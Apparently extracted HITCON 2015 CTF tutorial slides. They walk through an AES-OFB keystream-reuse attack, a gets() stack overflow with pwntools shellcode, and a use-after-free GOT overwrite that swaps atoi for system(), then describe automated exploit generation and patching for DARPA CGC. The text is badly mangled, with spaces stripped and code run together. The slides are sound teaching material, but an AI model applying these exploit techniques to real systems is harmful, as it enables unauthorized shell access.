ctf hello,world!
TRANSCRIPT
CTF:Hello,World!HITCON2015CTFConference
Dec5.– Dec6.,2015
1
黃世昆交通大學
Shih-KunHuang<[email protected]>
黃俊穎海洋大學
Chun-YingHuang<[email protected]>
HowDoYouFeel?
2
IfYouWerea…
Programmer Hacker Robot
除錯修補清理
找錯脅迫操控
符號運算、機器學習
CRS: 自動推論系統
CTF CGC
3
Outline
• CTFandAIS3FinalCTF• CTFServerSetup• SimplePractices
• Crypto• Pwn1• Pwn3
• FromCTFtoCGC
4
CTF
• TypeofCTFs• Jeopardy– Anytypeofproblems• AttackandDefense– Pwn +Patch• KingoftheHill– Pwn +Patch
• AIS3FinalCTF• Jeopardystyle• Misc,Binary,Pwn,Web,Crypto
5
CTFServerSetup
• Realserver(Linuxx64)+QEMU
• TricksforsimpleCTF• x86 orx64• Disablestackprotector• Allowcodeexecution instack• DisableASLR
$ gcc -m32 -fno-stack-protector -z execstack \hello.c -o hello
6
SimpleBufferOverflow
• OutdatedImplementation • Input"A"*20
7
int func1(int a, int b, int c) {char buffer[8]; // declare a character array of 8 bytesgets(buffer); // read user input stringreturn 0; // return zero
}
buffer[8]
0x00000000
0xffffffff
EBPret-addr
a
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
0x414141410x41414141
0x00000000
0xffffffff
0x414141410x414141410x41414141
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
StackProtector
• WithStackProtector • Input"A"*20
8
buffer[8]
0x00000000
0xffffffff
EBP
ret-addra
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
Canary (?)
0x414141410x41414141
0x00000000
0xffffffff
0x41414141
0x41414141a
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
0x41414141
CodeExecutioninStack
• Testifabinaryenablescodeexecutioninstack
• Enablecodeexecutioninstack(youmayneedthe'execstack'package)
9
$ execstack -c /path/to/myprog # disallow executable stack$ execstack -q /path/to/myprog- /path/to/myprog$ execstack -s /path/to/myprog # allow executable stack$ execstack -q /path/to/myprogX /path/to/myprog
$ readelf –l /path/to/myprog.set | grep –i stackGNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10$ readelf –l /path/to/myprog.clear | grep –i stackGNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10
ASLR
• AddressSpacesLayoutRandomization• Randomizedaddressforheapandstack• DisableASLR
• Randomizedstackspaces
• Randomizedheapandstackspaces(Ubuntudefault)
10
echo 0 > /proc/sys/kernel/randomize_va_space
echo 1 > /proc/sys/kernel/randomize_va_space
echo 2 > /proc/sys/kernel/randomize_va_space
ASLR(Cont’d)
• WithoutASLR(0) • WithASLR(1,2)
11
$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffffd3ac
m = 0x804b008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffffd3ac
m = 0x804b008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffffd3ac
m = 0x804b008
./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffdf6d8c
m = 0x9b03008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xff86930c
m = 0x9b1e008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xfff9b4bc
m = 0x88f3008
char buf[64];printf("main = %p\n", main);printf("gets = %p\n", gets);printf(" buf = %p\n", buf);printf(" m = %p\n", malloc(16));
Misc.Issue– xinetd
12
service gagb{
disable = notype = UNLISTEDid = gagbsocket_type = streamprotocol = tcpuser = gagbgroup = gagbwait = noserver = /home/gagb/gagbport = 9192
}
Misc.Issues– BufferingMode
• stdin/stdoutbufferingmode• Linebuffered• Fullybuffered• Nobuffered
13
setvbuf(stdin, NULL, _IONBF, 0);setvbuf(stdout, NULL, _IONBF, 0);
Misc.Issues– Permissions
• Disableaccessfor… • Firewallsetup• DefaultpolicyisDROP• Onlyallowrequiredincomingports
• Disallowoutgoingconnections
14
chmod 751 /chmod 751 /etcchmod 750 /sbinchmod 750 /usr/sbinchmod 551 /procchmod 551 /devchmod 711 /homechmod 1773 /tmp...cd $HOMEchown root:$OWNER . binary flagchmod 550 . binarychmod 440 flag
SimplePractices
• AsimpleserverforCTF:Hello,World!• 1cryptoand2pwns (flag@/home/*/flag)• HITCONCTFOnly:AccessibleonDec5.andDec6.
15
http://54.xxx.yyy.zzz/fun.html
PLEASE,PLEASE,PLEASEDON’THACKOURMACHINE~>_<~
SomeBackgrounds
• ProgrammingintheUNIX(Linux)environment• Alittlebitx86Assembly• Python• Pwntools• Patience
16
Practice:Crypto– cry2Host:54.xxx.yyy.zzz Port:5566Hint:thesourcecodeOrigin:dada@nctu
17
cry2– TheFirstImpression
18
cry2– TheSourceCode
19
1: key = "XXXXXXXXXXXXXXXX”2: iv = ''.join(random.choice(string.hexdigits) for _ in range(16))3: flag = "ais3{NEVERPHDNEVERPHDNEVERPHD..}" # Not real flag ...4: 5: def encrypt(p):6: return AES.new(key, AES.MODE_OFB, iv).encrypt(p)
...
7: print encrypt(flag).encode("hex")
8: while True:...
9: p = ''.join(random.choice(string.lowercase) for _ in range(32))10: print encrypt(p).encode("hex")
cry2–OutputFeedback(OFB)Mode
20
BlockCipherEncryption(AES)
InitialVector(IV)
Ciphertext
Plaintext
Key BlockCipherEncryption(AES)
Ciphertext
Plaintext
Key BlockCipherEncryption(AES)
Ciphertext
Plaintext
Key
BlockCipherEncryption(AES)
InitialVector(IV)
Ciphertext
Plaintext
Key
cry2– MisuseofOFBMode
21
32-bytestringsofloweralphabets
Ciphertextsoutputfrom
cry2
XOR-pad:a32-bytestring
cry2– Solution:CollectingCiphers
22
9c5a8d2fb81dea8361493cc360865d7b7e8dcf342d8f17774af46a0332cc1e969c5f8668b630cbb1526f19ec5eba705d5db9ee1601a6395b78d351271390409189509274a62bc5b25e741bec55b86f5548b0fd0901a334587ed655390484449f9057897db938cba5406b00e44ca9725d5dbee50410a9345177cf4c2a1884578e9b409578a926dfba507801ef42aa755d4ab2fd110db533557fde4f26079444808e549973aa30d5b74d7915ec40b17e4b4cb2ed121aa228487dc35d21108d4780924a947bbb32deb2437e1ef148b07b424cb1f21e1da73e4569c9422e1a8a5581855c9877a03cc8b14b6b1cf945a6684f5cb4f5141db136556dc94d2112815d9190459a64a73bcbb345760afe4cb26f5f4dabfc100da430436dcb5939138c42808a5f966ea537daa1407509e54fa4715756aef81b1fa7244b6cd5582610834a809a51957db920c4b6506315e453bd7e4a57a5ee1b18b330457ec1503a078f5b98...9b558a66b337dcb45d6d0fe457a5705752aaf4170fac345b62c74b3c1b874a9e9b40966ba021dca3556b02fe50b068444ea9e81018b323447bc34a29008356999354946aa820c4b049631bfa5dab69434da6f0051aa73f4b66ce4b2715864784
Thisiswhatwereallywanttodecode
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
cry2– UsePwntools
• Pwntools• AgoodCTFframeworkimplemented inpython• https://github.com/Gallopsled/pwntools
• QuickInstallationGuide(Ubuntu)
23
$ sudo apt-get install binutils python-dev python-pip $ sudo pip install pwntools
cry2– EnumerateAllCiphertexts
24
1: #!/usr/bin/env python2: from pwn import *3:4: #r = remote('54.xxx.yyy.zzz', 5566)5: r = process("./src.py")6: ciphers = []6:7: while len(ciphers) < 100:8: s = r.recvline().strip()9: if len(s) == 64:10: ciphers.append(s)11: r.send('\n')
cry2– Pseudocodes toObtaintheXOR-Pad
25
Given c: The list containing n ciphertexts (except the first one)c = [ c1, c2, c3, …, cn ]
Suppose cu,v represents the vth byte in ciphertext cu, 1 ≤ u ≤ n
pad = "";for v = 1 to 32:
for x = 0 to 255:if x XOR cu,v is a lowercase alphabet for all u in [1, n]pad = pad + xbreak
use pad to decrypt the real ciphertext and obtain the flag
cry2– SecurityPractice
• Correctuseofciphermodes• MustbeinitializedwithdifferentIVs
26
Practice:Pwn1– gagbHost:54.xxx.yyy.zzz Port:9192Hint:thebinaryOrigin:chun-ying
27
gagb – TheFirstImpression
28
gagb – Let’sLookattheBinary(IDAPro)
29
gagb – Let’sLookattheBinary(IDAPro– PseudocodeView)
30
gagb – TheProblem
31
gagb – Solution
• Eh…Wehavetoguessthenumberfirst!!• Strategy#1:Playwiththegame
• Pwntools:recv,send…tryallpossiblecombinations
• Strategy#2:Usetherandomnumbertrick• Rememberwehave:srand(time(0)) + rand()?• Inpython,wecando:
32
1: from ctypes import *2: cdll.LoadLibrary("libc.so.6")3: libc = CDLL("libc.so.6")4: libc.srand(libc.time(0))5: print libc.rand();
gagb – ATrickySolution
33
1: r = process("./gagb"); # this is from pwntools …
2: num = ""3: while len(num) < 4:4: while True:5: d = chr(libc.rand() % 10 + 48)6: if len(set(num + d)) == len(num + d):7: num = num + d8: break
9: print r.recv()10: print num11: r.send(num + '\n')12: print r.recv()
• Use ntpdate tosynchronizeyoursystemclock• Youmayneedtouncheck"HardwareClockinUTCTime"ifyouareplaying
withVirtualBox orothervirtualmachines…
gagb – TheOverflowPart:Strategy#1• Theoldtricks• Youhavetoguess thestackaddress• Fill"A"*28+addr +NOP*n+shellcode
34
context(arch = 'i386', os = 'linux')...shell = asm(shellcraft.sh())r.send('A'*28 + p32(0xffffdd70) + "\x90" * 400 + shell + "\n")r.interactive()
gagb – TheOverflowPart:Strategy#1(Cont’d)
35
0x4141...41
0x00000000
0xffffffff
0x41414141Jump to stack
Stackgrow
sinthisway
......
0x90909090......
0x90909090
shellcode
s[24]
0x00000000
0xffffffff
EBPret-addr
Stackgrow
sinthisway
LastStack Frame
CurrentStackFrame
......
gagb – TheOverflowPart:Strategy#2(1/3)• WewouldnotliketoguessanymoreL• Ask'gets()'todosomethingforus• Rememberthat'gets()'requiresonearguments–theaddresstostoretheuserinputstring
36
gagb – TheOverflowPart:Strategy#2(2/3)• Wewantthestacktolookslike…
37
s[24]
0x00000000
0xffffffff
EBPaddr of gets()
Stackgrow
sinthisway
......
ret-addrargument #1
returnaddraftergets()addressforgets()tofill
garbage
gagb – TheOverflowPart:Strategy#2(3/3)
• gets@plt canbeobtainedusingobjdump -d gagb
• Aftergets()finished,theprogramjumpstothebufferthatwehavefilledtheshellcode
38
r.send('A'*28 + p32(0x08048430) # gets@plt+ p32(0x0804a034) + p32(0x0804a034) # any writable address+ p32(0x12345678) * 100 + "\n") # garbage
r.send(shell + "\n") # fill gets() bufferr.interactive()
08048430 <gets@plt>:8048430: ff 25 0c a0 04 08 jmp *0x804a00c ; in GOT table8048436: 68 00 00 00 00 push $0x0804843b: e9 e0 ff ff ff jmp 8048420 <gets@plt-0x10>
gagb – SecurityPractice
• Nomoregets()• Use/dev/urandomor/dev/random• Or,alternatively,atleastdo
39
srand(time(0) ^ getpid());
Practice:Pwn3– phddbHost:54.xxx.yyy.zzz Port:3333Hint:thebinary,andthesystemClibraryOrigin:angelboy @ncu
40
phddb – TheFirstImpression
41
phddb – Let’sLookattheBinary(Assembly)
42Wehavesymbols
phddb – Let’sLookattheBinary(Pseudocode)
43
phddb – FeatureSummary
• Datastoredinheap – usemalloc()• dump• add
• Allocateheader first(32bytes)• Allocatethesis-textaccordingtothegivenlength
• edit• Modifyheadercontent• Reallocatethesis-textifnecessary
• remove
44
thesistext...
thesistext...
......
0x00000000
0xffffffff
name[20]age
length*thesis
name[20]age
length*thesis
Record#0Record#1
phddb – TheProblem:editphd()
45
realloc(ptr,0)==free(ptr)!?
phddb – Solution(1/6)
46
1.Addtworecords 2.Editrecords#0 3.Addonemorerecord
thesistext...
thesistext...
......
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
thesistext...
freed
......
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
thesistext...
thesistext...
...
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
name (ccc)age
length (32)*thesis
Record#2Record#2
phddb – Solution(2/6)
• Wewanttoknowtherealaddressofatoi inmemory
• WecanthenknowtheClibrarybase• Realaddressofatoi minusatoi’s offsetinClibrary• Useobjdump -d libc.so.6 togetatoi’s offset
• Fromobjdump -d phddb,wegottheGOTentryaddressforatoi is0x804b03c
47
08048560 <atoi@plt>:8048560: ff 25 3c b0 04 08 jmp *0x804b03c8048566: 68 60 00 00 00 push $0x60804856b: e9 20 ff ff ff jmp 8048490 <_init+0x30>
phddb – Solution(3/6)
• Editrecord#0• Fillthesistextusing:
• "A"*24• 0x20(length)• 0x804b03c
• GOTentryisafunctionpointertotherealaddressofafunction(in.so)
• Dumprecord#2• Revealatoi(?)
48
atoi (?)c99_scanf
......
GOT
0x804b03c0x804b038
0x804b040
thesistext...
thesistext......
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
name (ccc)age
length (32)*thesis
Record#2Record#2
phddb – Solution(4/6)
• Theatoi’s realaddressisrightafterthethirdcolon':'(0x3a)
• Note:It’slittleendian49
6e 61 6d 65 3a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 0a 61 67 65 3a 31 30 39 34 37 39 35 35 38 35 0a 74 68 65 73 69 73 3a 0a 60 95 e5 f7 0a 7c 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 48 44 64 62 20 4d 65 6e 75
phddb – Solution(5/6)
• Recallthatthemainfunctiondoesread()+atoi()• Wecanreplaceatoi’s GOTentryvaluetoanyfunctionwewanttocall
• Replaceatoi’s GOTentryvaluewiththerealaddressofsystem(),andthensend'sh\n'
• Simplearithmetic• atoi‘s realaddress=0xf7e59560• atoi offsetinClibrary=0x31560• systemoffsetinClibrary=0x3fcd0• system’srealaddress=0xf7e59560 – 0x31560 +0x3fcd0
=0xf7e67cd0
50
phddb – Solution(6/6)
• Editrecord#0• Fillthesistextusing:
• "A"*24• 0x20(length)• 0xf7e67cd0
• read()+atoi()nowbecomesread()+system()
• Send'sh\n'
51
atoi (0xf7e59560)c99_scanf
......
GOT
0x804b03c0x804b038
0x804b040
thesistext...
thesistext...
...
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
name (ccc)age
length (32)*thesis
Record#2Record#2
system (0xf7e67cd0)
phddb – SecurityPractice
• GOThijacking• Neveruse-after-free• Specialcaseofrealloc(ptr,size)
52
FromCTFtoCGC從工人智慧搶旗
到
人工智慧自動攻防
53
SecurityisBugs.FromLinusTorvalds
54
FromCTFtoCGC
• TheCyberWar• CyberArmy
• CaptureTheFlag(CTF)• Informationsecuritycompetition
• CyberGrandChallenge(CGC)• All-computerCTFtournament• HeldbyDARPAofUSDoDwiththeDEFCONConferenceinLasVegasin2016
55
Objective
• BuildaCyberReasoningSystem(CRS)• FollowCGCrules• Automaticattackanddefense
• AutomaticAttack• Analyzetheprogrambinarytofindthefailure• Generateexploit• Payloadtobypassmitigation
• AutomaticDefense
• Analyzetheprogramtofindthefault
• Findthefaultypoint
• Patchthefaultinbinarylevel
56
Pre-Exploitation
Peri-Exploitation
End-Exploitation
Post-Exploitation
securityauditingtools(nessus,metasploit,sqlmap) developerbugforensictools
SoftwareExploitationFramework
CRSIntegrationforCGC- Attack
● Target-awareSymbolicFuzzing● AutomaticExploit Generation● Anti-MitigationPayload
Generation● PostExploitationIntegration
Fuzzer
測、脅、隱、控
CRSIntegrationforCGC- Defense
● FaultLocalization(path)● DataSlicing(data)● PatchingSiteIsolation
測、修、補、清
AutomaticAttack
60
Integration
● AutomaticExploit Generation(CRAX)
● PostExploitationFramework(Metasploit)
Integration- CRAX
Integration- CRAXwithROP
Result – Compare with ROPgadget
• ROPgadget:Commonopensourcesearchandchaingadgetstool
ToolCompare
ExploitStrengthening ROPgadget
Gadget Type Long/ShortGadgets ShortGadgets
PayloadType TuringcompleteROP PayloadAPI Onetypepayload
Integrate CRAX+Metasploit
Result – Compare with ROPgadget
• Payloadtype:exevc(“/bin/sh”)
Program Name
Program Size
Exploit Strengthening ROPgadgetTotal
Gadgets Time GeneratePayload Time Generate
Payloadgdb 7.7.1 4.9M 133K 36.2s True 278s True
nautilus 3.10.1 1.4M 58K 13.9s True -- Falsegpg 1.4.16 971K 25K 5.5s True 17.1s Truevim.tiny 7.4 806K 25K 5.0s True -- Falselshw b.02.16 755K 8K 2.4s True -- False
gcc 4.8 700K 4K 2.9s True 10.7s Trueobjdump 2.24 333K 8K 1.4s True -- Falsereadom 1.1.11 180K 4.9K 0.9s True -- False
curl 7.35.0 149K 2.9K 0.7s True -- Falsefactor 8.21 104K 2.3K 0.5s True -- False
Result – with Different Program Size
● Fortyprogramsin/usr/bin,sizebetween100KBand5MB.
AutomaticDefense
67
Method- CRSArchitecture
68
Method- Dstaralgorithm
• CF:Covered&Failed
• CS:Covered&Successful
• UF:Uncovered&Failed
• US:Uncovered&Successful
• Calculatetherankingfromtheformula:!"#
$"%!&
69
Method- DynamicSlicing
• Anentireprogramtree→apath
• Weneedmoreinformationforpatching
70
Method- DynamicSlicing
71
Method- Patching
• AccordingtotheCGCrule,CRSmustpatchthebinaryprogramwithoutsourcecode
• Therearedifferenttrickstopatchdifferentfaults
• Wemustanalyzethetypeoffaultbeforepatchingit• OurCRSistargetedatstack-basedbufferoverflow
72
Evaluation
• 24 challenge binaries (CB) for testing
• The fault of types include :
• CWE-121: Stack-based Buffer Overflow
• CWE-122: Heap based Buffer Overflow
• CWE-787: Out-of-bounds Write
• CWE-476: NULL Pointer Dereference
• ….• We choose the stack-based overflow CBs to evaluate our CRS.
73
Evaluation- Summary
Challenge id Faulttype Method1 Method2Availability Security Availability Security
CADET_00001 2 Success Success Success Success
CROMU_00007 3 Failed Success Failed Failed
KPRCA_00001 1 Failed Failed Success Success
LUNGE_00005 3 Failed Failed Success Success
NRFIN_00003 2 Success Success Failed Failed
74
Evaluation- preliminaryScoredEvent
Challenge id Availability Security Both Total
CADET_00001 72 44 37 80
CROMU_00007 20 12 9 25
KPRCA_00001 126 121 116 139
LUNGE_00005 61 33 27 70
NRFIN_00003 58 24 9 79
75
Conclusions
• WeproposeanautomaticbinarypatchmethodforCGC
• Faultlocalization• BinaryPatch
• Ourmethodcansucceedinpatchingfivechallengebinaries
• Onlyfailinoneavailabilitytest• Allsecuritytestspass
76
相關系統
• CRAX• AutomaticExploitGeneration(Non-Web攻擊生成)• https://github.com/SQLab/CRAX
• CRAXWeb• WebExploitGeneration (Web攻擊生成)• https://github.com/SQLab/CRAXWeb
• Ropchain (ROP bypassingASLR,DEPpayload生成)• ROPPayloadGeneration• https://github.com/SQLab/ropchain
• CRAXfuzz• SymbolicFuzzingFramework (符號形式之模糊測試)
• CRAXcrs• AutomaticDefensebyFaultLocalizationandDynamicPatch(錯誤定位與自動修補達成自動化
防禦)
77
Q&AThanksforyourattention!
78